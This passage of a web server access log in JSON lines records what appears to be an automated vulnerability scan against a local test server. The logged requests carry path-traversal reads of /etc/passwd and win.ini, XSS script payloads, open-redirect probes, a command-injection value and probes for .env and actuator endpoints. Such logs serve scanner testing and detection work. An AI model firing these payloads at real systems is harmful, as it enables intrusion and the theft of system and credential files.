+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"{\x22email\x22:\x2229KAnn9dVravg2QKtbyxFicg86n@example.com\x22,\x22password\x22:\x2229KAnn9dVravg2QKtbyxFicg86n\x22,\x22username\x22:\x2229KAnn9dVravg2QKtbyxFicg86n\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A29KAnp7lCQBKBBZgUlxq8oohvrQ\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@29KAnp7lCQBKBBZgUlxq8oohvrQ.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"{\x22name\x22:\x2229KAnn9dVravg2QKtbyxFicg86n\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} 